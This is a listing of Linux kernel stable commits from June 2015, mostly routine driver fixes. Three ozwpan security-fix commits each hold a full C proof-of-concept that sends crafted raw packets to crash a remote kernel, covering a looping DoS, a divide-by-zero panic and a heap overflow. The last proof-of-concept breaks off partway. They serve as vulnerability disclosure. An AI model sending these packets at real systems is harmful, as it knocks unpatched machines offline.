1. 23 Jun, 2015 40 commits
    • Thomas Petazzoni's avatar
      Revert "bus: mvebu-mbus: make sure SDRAM CS for DMA don't overlap the MBus bridge window" · 16c1a8f3
      Thomas Petazzoni authored
      commit 885dbd15 upstream.
      
      This reverts commit 1737cac6 ("bus: mvebu-mbus: make sure SDRAM CS
      for DMA don't overlap the MBus bridge window"), because it breaks DMA
      on platforms having more than 2 GB of RAM.
      
      This commit changed the information reported to DMA masters device
      drivers through the mv_mbus_dram_info() function so that the returned
      DRAM ranges do not overlap with I/O windows.
      
      This was necessary as a preparation to support the new CESA Crypto
      Engine driver, which will use DMA for cryptographic operations. But
      since it does DMA with the SRAM which is mapped as an I/O window,
      having DRAM ranges overlapping with I/O windows was problematic.
      
      To solve this, the above mentioned commit changed the mvebu-mbus to
      adjust the DRAM ranges so that they don't overlap with the I/O
      windows. However, by doing this, we re-adjust the DRAM ranges in a way
      that makes them have a size that is no longer a power of two. While
      this is perfectly fine for the Crypto Engine, which supports DRAM
      ranges with a granularity of 64 KB, it breaks basically all other DMA
      masters, which expect power of two sizes for the DRAM ranges.
      
      Due to this, if the installed system memory is 4 GB, in two
      chip-selects of 2 GB, the second DRAM range will be reduced from 2 GB
      to a little bit less than 2 GB to not overlap with the I/O windows, in
      a way that results in a DRAM range that doesn't have a power of two
      size. This means that whenever you do a DMA transfer with an address
      located in the [ 2 GB ; 4 GB ] area, it will freeze the system. Any
      serious DMA activity like simply running:
      
        for i in $(seq 1 64) ; do dd if=/dev/urandom of=file$i bs=1M count=16 ; done
      
      in an ext3 partition mounted over a SATA drive will freeze the system.
      
      Since the new CESA crypto driver that uses DMA has not been merged
      yet, the easiest fix is to simply revert this commit. A follow-up
      commit will introduce a different solution for the CESA crypto driver.
      Signed-off-by: default avatarThomas Petazzoni <thomas.petazzoni@free-electrons.com>
      Fixes: 1737cac6 ("bus: mvebu-mbus: make sure SDRAM CS for DMA don't overlap the MBus bridge window")
      Signed-off-by: default avatarGregory CLEMENT <gregory.clement@free-electrons.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      16c1a8f3
    • Nicolas Schichan's avatar
      bus: mvebu-mbus: do not set WIN_CTRL_SYNCBARRIER on non io-coherent platforms. · e2045b79
      Nicolas Schichan authored
      commit 8c9e06e6 upstream.
      
      Commit a0b5cd4a ("bus: mvebu-mbus: use automatic I/O
      synchronization barriers") enabled the usage of automatic I/O
      synchronization barriers by enabling bit WIN_CTRL_SYNCBARRIER in the
      control registers of MBus windows, but on non io-coherent platforms
      (orion5x, kirkwood and dove) the WIN_CTRL_SYNCBARRIER bit in
      the window control register is either reserved (all windows except 6
      and 7) or enables read-only protection (windows 6 and 7).
      Signed-off-by: default avatarNicolas Schichan <nschichan@freebox.fr>
      Reviewed-by: default avatarThomas Petazzoni <thomas.petazzoni@free-electrons.com>
      Fixes: a0b5cd4a ("bus: mvebu-mbus: use automatic I/O synchronization barriers")
      Signed-off-by: default avatarThomas Petazzoni <thomas.petazzoni@free-electrons.com>
      Signed-off-by: default avatarGregory CLEMENT <gregory.clement@free-electrons.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      e2045b79
    • Nadav Haklai's avatar
      ata: ahci_mvebu: Fix wrongly set base address for the MBus window setting · 7dcb6917
      Nadav Haklai authored
      commit e96998fc upstream.
      
      According to the Armada 38x datasheet, the window base address
      registers value is set in bits [31:4] of the register and corresponds
      to the transaction address bits [47:20].
      
      Therefore, the 32bit base address value should be shifted right by
      20bits and left by 4bits, resulting in 16 bit shift right.
      
      The bug as not been noticed yet because if the memory available on
      the platform is less than 2GB, then the base address is zero.
      
      [gregory.clement@free-electrons.com: add extra-explanation]
      
      Fixes: a3464ed2 (ata: ahci_mvebu: new driver for Marvell Armada 380
      AHCI interfaces)
      Signed-off-by: default avatarNadav Haklai <nadavh@marvell.com>
      Reviewed-by: default avatarOmri Itach <omrii@marvell.com>
      Signed-off-by: default avatarGregory CLEMENT <gregory.clement@free-electrons.com>
      Signed-off-by: default avatarTejun Heo <tj@kernel.org>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      7dcb6917
    • Jiang Liu's avatar
      virtio_pci: Clear stale cpumask when setting irq affinity · 4c4a45ac
      Jiang Liu authored
      commit 210d150e upstream.
      
      The cpumask vp_dev->msix_affinity_masks[info->msix_vector] may contain
      staled information when vp_set_vq_affinity() gets called, so clear it
      before setting the new cpu bit mask.
      Signed-off-by: default avatarJiang Liu <jiang.liu@linux.intel.com>
      Signed-off-by: default avatarMichael S. Tsirkin <mst@redhat.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      4c4a45ac
    • Geert Uytterhoeven's avatar
      of/dynamic: Fix test for PPC_PSERIES · e3bb98bb
      Geert Uytterhoeven authored
      commit f76502aa upstream.
      
      "IS_ENABLED(PPC_PSERIES)" always evaluates to false, as IS_ENABLED() is
      supposed to be used with the full Kconfig symbol name, including the
      "CONFIG_" prefix.
      
      Add the missing "CONFIG_" prefix to fix this.
      
      Fixes: a25095d4 ("of: Move dynamic node fixups out of powerpc and into common code")
      Signed-off-by: default avatarGeert Uytterhoeven <geert+renesas@glider.be>
      Signed-off-by: default avatarGrant Likely <grant.likely@linaro.org>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      e3bb98bb
    • Philipp Zabel's avatar
      serial: imx: Fix DMA handling for IDLE condition aborts · c0a04ee8
      Philipp Zabel authored
      commit 392bceed upstream.
      
      The driver configures the IDLE condition to interrupt the SDMA engine.
      Since the SDMA UART ROM script doesn't clear the IDLE bit itself, this
      caused repeated 1-byte DMA transfers, regardless of available data in the
      RX FIFO. Also, when returning due to the IDLE condition, the UART ROM
      script already increased its counter, causing residue to be off by one.
      
      This patch clears the IDLE condition to avoid repeated 1-byte DMA transfers
      and decreases count by when the DMA transfer was aborted due to the IDLE
      condition, fixing serial transfers using DMA on i.MX6Q.
      Reported-by: default avatarPeter Seiderer <ps.report@gmx.net>
      Signed-off-by: default avatarPhilipp Zabel <p.zabel@pengutronix.de>
      Tested-by: default avatarFabio Estevam <fabio.estevam@freescale.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      c0a04ee8
    • Michel Dänzer's avatar
      drm/radeon: Make sure radeon_vm_bo_set_addr always unreserves the BO · be37f505
      Michel Dänzer authored
      commit ee18e599 upstream.
      
      Some error paths didn't unreserve the BO. This resulted in a deadlock
      down the road on the next attempt to reserve the (still reserved) BO.
      
      Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=90873Reviewed-by: default avatarChristian König <christian.koenig@amd.com>
      Signed-off-by: default avatarMichel Dänzer <michel.daenzer@amd.com>
      Signed-off-by: default avatarAlex Deucher <alexander.deucher@amd.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      be37f505
    • Alex Deucher's avatar
      Revert "drm/radeon: adjust pll when audio is not enabled" · 2491a840
      Alex Deucher authored
      commit ebb9bf18 upstream.
      
      This reverts commit 7fe04d6f.
      
      Fixes some systems at the expense of others.  Need to properly
      fix the pll divider selection.
      
      bug:
      https://bugzilla.kernel.org/show_bug.cgi?id=99651Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      2491a840
    • Alex Deucher's avatar
      Revert "drm/radeon: don't share plls if monitors differ in audio support" · e1e2b780
      Alex Deucher authored
      commit 6fb3c025 upstream.
      
      This reverts commit a10f0df0.
      
      Fixes some systems at the expense of others.  Need to properly
      fix the pll divider selection.
      
      bug:
      https://bugzilla.kernel.org/show_bug.cgi?id=99651Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      e1e2b780
    • Jérôme Glisse's avatar
      drm/radeon: fix freeze for laptop with Turks/Thames GPU. · 0be48e36
      Jérôme Glisse authored
      commit 6dfd1972 upstream.
      
      Laptop with Turks/Thames GPU will freeze if dpm is enabled. It seems
      the SMC engine is relying on some state inside the CP engine. CP needs
      to chew at least one packet for it to get in good state for dynamic
      power management.
      
      This patch simply disabled and re-enable DPM after the ring test which
      is enough to avoid the freeze.
      Signed-off-by: default avatarJérôme Glisse <jglisse@redhat.com>
      Signed-off-by: default avatarAlex Deucher <alexander.deucher@amd.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      0be48e36
    • Jani Nikula's avatar
      drm/i915: Fix DDC probe for passive adapters · 4357dd79
      Jani Nikula authored
      commit 3f5f1554 upstream.
      
      Passive DP->DVI/HDMI dongles on DP++ ports show up to the system as HDMI
      devices, as they do not have a sink device in them to respond to any AUX
      traffic. When probing these dongles over the DDC, sometimes they will
      NAK the first attempt even though the transaction is valid and they
      support the DDC protocol. The retry loop inside of
      drm_do_probe_ddc_edid() would normally catch this case and try the
      transaction again, resulting in success.
      
      That, however, was thwarted by the fix for [1]:
      
      commit 9292f37e
      Author: Eugeni Dodonov <eugeni.dodonov@intel.com>
      Date:   Thu Jan 5 09:34:28 2012 -0200
      
          drm: give up on edid retries when i2c bus is not responding
      
      This added code to exit immediately if the return code from the
      i2c_transfer function was -ENXIO in order to reduce the amount of time
      spent in waiting for unresponsive or disconnected devices. That was
      possible because the underlying i2c bit banging algorithm had retries of
      its own (which, of course, were part of the reason for the bug the
      commit fixes).
      
      Since its introduction in
      
      commit f899fc64
      Author: Chris Wilson <chris@chris-wilson.co.uk>
      Date:   Tue Jul 20 15:44:45 2010 -0700
      
          drm/i915: use GMBUS to manage i2c links
      
      we've been flipping back and forth enabling the GMBUS transfers, but
      we've settled since then. The GMBUS implementation does not do any
      retries, however, bailing out of the drm_do_probe_ddc_edid() retry loop
      on first encounter of -ENXIO. This, combined with Eugeni's commit, broke
      the retry on -ENXIO.
      
      Retry GMBUS once on -ENXIO on first message to mitigate the issues with
      passive adapters.
      
      This patch is based on the work, and commit message, by Todd Previte
      <tprevite@gmail.com>.
      
      [1] https://bugs.freedesktop.org/show_bug.cgi?id=41059
      
      v2: Don't retry if using bit banging.
      
      v3: Move retry within gmbux_xfer, retry only on first message.
      
      v4: Initialize GMBUS0 on retry (Ville).
      
      v5: Take index reads into account (Ville).
      
      Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=85924
      Cc: Todd Previte <tprevite@gmail.com>
      Tested-by: Oliver Grafe <oliver.grafe@ge.com> (v2)
      Tested-by: default avatarJim Bride <jim.bride@linux.intel.com>
      Reviewed-by: default avatarVille Syrjälä <ville.syrjala@linux.intel.com>
      Signed-off-by: default avatarJani Nikula <jani.nikula@intel.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      4357dd79
    • Ville Syrjälä's avatar
      drm/i915: Don't skip request retirement if the active list is empty · 42a46a0d
      Ville Syrjälä authored
      commit 0aedb162 upstream.
      
      Apparently we can have requests even if though the active list is empty,
      so do the request retirement regardless of whether there's anything
      on the active list.
      
      The way it happened here is that during suspend intel_ring_idle()
      notices the olr hanging around and then proceeds to get rid of it by
      adding a request. However since there was nothing on the active lists
      i915_gem_retire_requests() didn't clean those up, and so the idle work
      never runs, and we leave the GPU "busy" during suspend resulting in a
      WARN later.
      Signed-off-by: default avatarVille Syrjälä <ville.syrjala@linux.intel.com>
      Reviewed-by: default avatarChris Wilson <chris@chris-wilson.co.uk>
      Signed-off-by: default avatarJani Nikula <jani.nikula@intel.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      42a46a0d
    • Jim Bride's avatar
      drm/i915/hsw: Fix workaround for server AUX channel clock divisor · 17847c61
      Jim Bride authored
      commit e058c945 upstream.
      
      According to the HSW b-spec we need to try clock divisors of 63
      and 72, each 3 or more times, when attempting DP AUX channel
      communication on a server chipset.  This actually wasn't happening
      due to a short-circuit that only checked the DP_AUX_CH_CTL_DONE bit
      in status rather than checking that the operation was done and
      that DP_AUX_CH_CTL_TIME_OUT_ERROR was not set.
      
      [v2] Implemented alternate solution suggested by Jani Nikula.
      Signed-off-by: default avatarJim Bride <jim.bride@linux.intel.com>
      Signed-off-by: default avatarJani Nikula <jani.nikula@intel.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      17847c61
    • Alex Deucher's avatar
      drm/radeon: use proper ACR regisiter for DCE3.2 · 87e5e086
      Alex Deucher authored
      commit 091f0a70 upstream.
      
      Using the DCE2 one by accident afer the audio rework.
      
      Bug:
      https://bugs.freedesktop.org/show_bug.cgi?id=90777Signed-off-by: default avatarAlex Deucher <alexander.deucher@amd.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      87e5e086
    • Alexey Skidanov's avatar
      drm/amdkfd: fix topology bug with capability attr. · fd358228
      Alexey Skidanov authored
      commit 826f5de8 upstream.
      
      This patch fixes a bug where the number of watch points
      was shown before it was actually calculated
      Signed-off-by: default avatarAlexey Skidanov <Alexey.Skidanov@amd.com>
      Signed-off-by: default avatarOded Gabbay <oded.gabbay@gmail.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      fd358228
    • Matthijs van Duin's avatar
      ARM: dts: am335x-boneblack: disable RTC-only sleep to avoid hardware damage · 052c4f41
      Matthijs van Duin authored
      commit 7a6cb0ab upstream.
      
      Avoid entering "RTC-only mode" at poweroff. It is unsupported by most
      versions of BeagleBone, and risks hardware damage.
      
      The damaging configuration is having system-power-controller
      without ti,pmic-shutdown-controller.
      Reported-by: default avatarMatthijs van Duin <matthijsvanduin@gmail.com>
      Tested-by: default avatarMatthijs van Duin <matthijsvanduin@gmail.com>
      Signed-off-by: default avatarRobert Nelson <robertcnelson@gmail.com>
      Cc: Tony Lindgren <tony@atomide.com>
      Cc: Felipe Balbi <balbi@ti.com>
      Cc: Johan Hovold <johan@kernel.org>
      [Matthijs van Duin: added explanatory comments]
      Signed-off-by: default avatarMatthijs van Duin <matthijsvanduin@gmail.com>
      Fixes: http://bugs.elinux.org/issues/143
      [tony@atomide.com: updated comments with the hardware breaking info]
      Signed-off-by: default avatarTony Lindgren <tony@atomide.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      052c4f41
    • Aaro Koskinen's avatar
      pata_octeon_cf: fix broken build · 5aa4368d
      Aaro Koskinen authored
      commit 4710f2fa upstream.
      
      MODULE_DEVICE_TABLE is referring to wrong driver's table and breaks the
      build. Fix that.
      Signed-off-by: default avatarAaro Koskinen <aaro.koskinen@nokia.com>
      Signed-off-by: default avatarTejun Heo <tj@kernel.org>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      5aa4368d
    • Jason A. Donenfeld's avatar
      ozwpan: unchecked signed subtraction leads to DoS · 64b1cf4c
      Jason A. Donenfeld authored
      commit 9a59029b upstream.
      
      The subtraction here was using a signed integer and did not have any
      bounds checking at all. This commit adds proper bounds checking, made
      easy by use of an unsigned integer. This way, a single packet won't be
      able to remotely trigger a massive loop, locking up the system for a
      considerable amount of time. A PoC follows below, which requires
      ozprotocol.h from this module.
      
      =-=-=-=-=-=
      
       #include <arpa/inet.h>
       #include <linux/if_packet.h>
       #include <net/if.h>
       #include <netinet/ether.h>
       #include <stdio.h>
       #include <string.h>
       #include <stdlib.h>
       #include <endian.h>
       #include <sys/ioctl.h>
       #include <sys/socket.h>
      
       #define u8 uint8_t
       #define u16 uint16_t
       #define u32 uint32_t
       #define __packed __attribute__((__packed__))
       #include "ozprotocol.h"
      
      static int hex2num(char c)
      {
      	if (c >= '0' && c <= '9')
      		return c - '0';
      	if (c >= 'a' && c <= 'f')
      		return c - 'a' + 10;
      	if (c >= 'A' && c <= 'F')
      		return c - 'A' + 10;
      	return -1;
      }
      static int hwaddr_aton(const char *txt, uint8_t *addr)
      {
      	int i;
      	for (i = 0; i < 6; i++) {
      		int a, b;
      		a = hex2num(*txt++);
      		if (a < 0)
      			return -1;
      		b = hex2num(*txt++);
      		if (b < 0)
      			return -1;
      		*addr++ = (a << 4) | b;
      		if (i < 5 && *txt++ != ':')
      			return -1;
      	}
      	return 0;
      }
      
      int main(int argc, char *argv[])
      {
      	if (argc < 3) {
      		fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
      		return 1;
      	}
      
      	uint8_t dest_mac[6];
      	if (hwaddr_aton(argv[2], dest_mac)) {
      		fprintf(stderr, "Invalid mac address.\n");
      		return 1;
      	}
      
      	int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
      	if (sockfd < 0) {
      		perror("socket");
      		return 1;
      	}
      
      	struct ifreq if_idx;
      	int interface_index;
      	strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
      	if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
      		perror("SIOCGIFINDEX");
      		return 1;
      	}
      	interface_index = if_idx.ifr_ifindex;
      	if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
      		perror("SIOCGIFHWADDR");
      		return 1;
      	}
      	uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_elt_connect_req oz_elt_connect_req;
      		struct oz_elt oz_elt2;
      		struct oz_multiple_fixed oz_multiple_fixed;
      	} __packed packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(0)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_CONNECT_REQ,
      			.length = sizeof(struct oz_elt_connect_req)
      		},
      		.oz_elt_connect_req = {
      			.mode = 0,
      			.resv1 = {0},
      			.pd_info = 0,
      			.session_id = 0,
      			.presleep = 0,
      			.ms_isoc_latency = 0,
      			.host_vendor = 0,
      			.keep_alive = 0,
      			.apps = htole16((1 << OZ_APPID_USB) | 0x1),
      			.max_len_div16 = 0,
      			.ms_per_isoc = 0,
      			.up_audio_buf = 0,
      			.ms_per_elt = 0
      		},
      		.oz_elt2 = {
      			.type = OZ_ELT_APP_DATA,
      			.length = sizeof(struct oz_multiple_fixed) - 3
      		},
      		.oz_multiple_fixed = {
      			.app_id = OZ_APPID_USB,
      			.elt_seq_num = 0,
      			.type = OZ_USB_ENDPOINT_DATA,
      			.endpoint = 0,
      			.format = OZ_DATA_F_MULTIPLE_FIXED,
      			.unit_size = 1,
      			.data = {0}
      		}
      	};
      
      	struct sockaddr_ll socket_address = {
      		.sll_ifindex = interface_index,
      		.sll_halen = ETH_ALEN,
      		.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      	};
      
      	if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	return 0;
      }
      Signed-off-by: default avatarJason A. Donenfeld <Jason@zx2c4.com>
      Acked-by: default avatarDan Carpenter <dan.carpenter@oracle.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      64b1cf4c
    • Jason A. Donenfeld's avatar
      ozwpan: divide-by-zero leading to panic · e0f077be
      Jason A. Donenfeld authored
      commit 04bf464a upstream.
      
      A network supplied parameter was not checked before division, leading to
      a divide-by-zero. Since this happens in the softirq path, it leads to a
      crash. A PoC follows below, which requires the ozprotocol.h file from
      this module.
      
      =-=-=-=-=-=
      
       #include <arpa/inet.h>
       #include <linux/if_packet.h>
       #include <net/if.h>
       #include <netinet/ether.h>
       #include <stdio.h>
       #include <string.h>
       #include <stdlib.h>
       #include <endian.h>
       #include <sys/ioctl.h>
       #include <sys/socket.h>
      
       #define u8 uint8_t
       #define u16 uint16_t
       #define u32 uint32_t
       #define __packed __attribute__((__packed__))
       #include "ozprotocol.h"
      
      static int hex2num(char c)
      {
      	if (c >= '0' && c <= '9')
      		return c - '0';
      	if (c >= 'a' && c <= 'f')
      		return c - 'a' + 10;
      	if (c >= 'A' && c <= 'F')
      		return c - 'A' + 10;
      	return -1;
      }
      static int hwaddr_aton(const char *txt, uint8_t *addr)
      {
      	int i;
      	for (i = 0; i < 6; i++) {
      		int a, b;
      		a = hex2num(*txt++);
      		if (a < 0)
      			return -1;
      		b = hex2num(*txt++);
      		if (b < 0)
      			return -1;
      		*addr++ = (a << 4) | b;
      		if (i < 5 && *txt++ != ':')
      			return -1;
      	}
      	return 0;
      }
      
      int main(int argc, char *argv[])
      {
      	if (argc < 3) {
      		fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
      		return 1;
      	}
      
      	uint8_t dest_mac[6];
      	if (hwaddr_aton(argv[2], dest_mac)) {
      		fprintf(stderr, "Invalid mac address.\n");
      		return 1;
      	}
      
      	int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
      	if (sockfd < 0) {
      		perror("socket");
      		return 1;
      	}
      
      	struct ifreq if_idx;
      	int interface_index;
      	strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
      	if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
      		perror("SIOCGIFINDEX");
      		return 1;
      	}
      	interface_index = if_idx.ifr_ifindex;
      	if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
      		perror("SIOCGIFHWADDR");
      		return 1;
      	}
      	uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_elt_connect_req oz_elt_connect_req;
      		struct oz_elt oz_elt2;
      		struct oz_multiple_fixed oz_multiple_fixed;
      	} __packed packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(0)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_CONNECT_REQ,
      			.length = sizeof(struct oz_elt_connect_req)
      		},
      		.oz_elt_connect_req = {
      			.mode = 0,
      			.resv1 = {0},
      			.pd_info = 0,
      			.session_id = 0,
      			.presleep = 0,
      			.ms_isoc_latency = 0,
      			.host_vendor = 0,
      			.keep_alive = 0,
      			.apps = htole16((1 << OZ_APPID_USB) | 0x1),
      			.max_len_div16 = 0,
      			.ms_per_isoc = 0,
      			.up_audio_buf = 0,
      			.ms_per_elt = 0
      		},
      		.oz_elt2 = {
      			.type = OZ_ELT_APP_DATA,
      			.length = sizeof(struct oz_multiple_fixed)
      		},
      		.oz_multiple_fixed = {
      			.app_id = OZ_APPID_USB,
      			.elt_seq_num = 0,
      			.type = OZ_USB_ENDPOINT_DATA,
      			.endpoint = 0,
      			.format = OZ_DATA_F_MULTIPLE_FIXED,
      			.unit_size = 0,
      			.data = {0}
      		}
      	};
      
      	struct sockaddr_ll socket_address = {
      		.sll_ifindex = interface_index,
      		.sll_halen = ETH_ALEN,
      		.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      	};
      
      	if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	return 0;
      }
      Signed-off-by: default avatarJason A. Donenfeld <Jason@zx2c4.com>
      Acked-by: default avatarDan Carpenter <dan.carpenter@oracle.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      e0f077be
    • Jason A. Donenfeld's avatar
      ozwpan: Use unsigned ints to prevent heap overflow · d1933bf4
      Jason A. Donenfeld authored
      commit b1bb5b49 upstream.
      
      Using signed integers, the subtraction between required_size and offset
      could wind up being negative, resulting in a memcpy into a heap buffer
      with a negative length, resulting in huge amounts of network-supplied
      data being copied into the heap, which could potentially lead to remote
      code execution.. This is remotely triggerable with a magic packet.
      A PoC which obtains DoS follows below. It requires the ozprotocol.h file
      from this module.
      
      =-=-=-=-=-=
      
       #include <arpa/inet.h>
       #include <linux/if_packet.h>
       #include <net/if.h>
       #include <netinet/ether.h>
       #include <stdio.h>
       #include <string.h>
       #include <stdlib.h>
       #include <endian.h>
       #include <sys/ioctl.h>
       #include <sys/socket.h>
      
       #define u8 uint8_t
       #define u16 uint16_t
       #define u32 uint32_t
       #define __packed __attribute__((__packed__))
       #include "ozprotocol.h"
      
      static int hex2num(char c)
      {
      	if (c >= '0' && c <= '9')
      		return c - '0';
      	if (c >= 'a' && c <= 'f')
      		return c - 'a' + 10;
      	if (c >= 'A' && c <= 'F')
      		return c - 'A' + 10;
      	return -1;
      }
      static int hwaddr_aton(const char *txt, uint8_t *addr)
      {
      	int i;
      	for (i = 0; i < 6; i++) {
      		int a, b;
      		a = hex2num(*txt++);
      		if (a < 0)
      			return -1;
      		b = hex2num(*txt++);
      		if (b < 0)
      			return -1;
      		*addr++ = (a << 4) | b;
      		if (i < 5 && *txt++ != ':')
      			return -1;
      	}
      	return 0;
      }
      
      int main(int argc, char *argv[])
      {
      	if (argc < 3) {
      		fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
      		return 1;
      	}
      
      	uint8_t dest_mac[6];
      	if (hwaddr_aton(argv[2], dest_mac)) {
      		fprintf(stderr, "Invalid mac address.\n");
      		return 1;
      	}
      
      	int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
      	if (sockfd < 0) {
      		perror("socket");
      		return 1;
      	}
      
      	struct ifreq if_idx;
      	int interface_index;
      	strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
      	if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
      		perror("SIOCGIFINDEX");
      		return 1;
      	}
      	interface_index = if_idx.ifr_ifindex;
      	if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
      		perror("SIOCGIFHWADDR");
      		return 1;
      	}
      	uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_elt_connect_req oz_elt_connect_req;
      	} __packed connect_packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(0)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_CONNECT_REQ,
      			.length = sizeof(struct oz_elt_connect_req)
      		},
      		.oz_elt_connect_req = {
      			.mode = 0,
      			.resv1 = {0},
      			.pd_info = 0,
      			.session_id = 0,
      			.presleep = 35,
      			.ms_isoc_latency = 0,
      			.host_vendor = 0,
      			.keep_alive = 0,
      			.apps = htole16((1 << OZ_APPID_USB) | 0x1),
      			.max_len_div16 = 0,
      			.ms_per_isoc = 0,
      			.up_audio_buf = 0,
      			.ms_per_elt = 0
      		}
      	};
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_get_desc_rsp oz_get_desc_rsp;
      	} __packed pwn_packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(1)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_APP_DATA,
      			.length = sizeof(struct oz_get_desc_rsp)
      		},
      		.oz_get_desc_rsp = {
      			.app_id = OZ_APPID_USB,
      			.elt_seq_num = 0,
      			.type = OZ_GET_DESC_RSP,
      			.req_id = 0,
      			.offset = htole16(2),
      			.total_size = htole16(1),
      			.rcode = 0,
      			.data = {0}
      		}
      	};
      
      	struct sockaddr_ll socket_address = {
      		.sll_ifindex = interface_index,
      		.sll_halen = ETH_ALEN,
      		.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      	};
      
      	if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	usleep(300000);
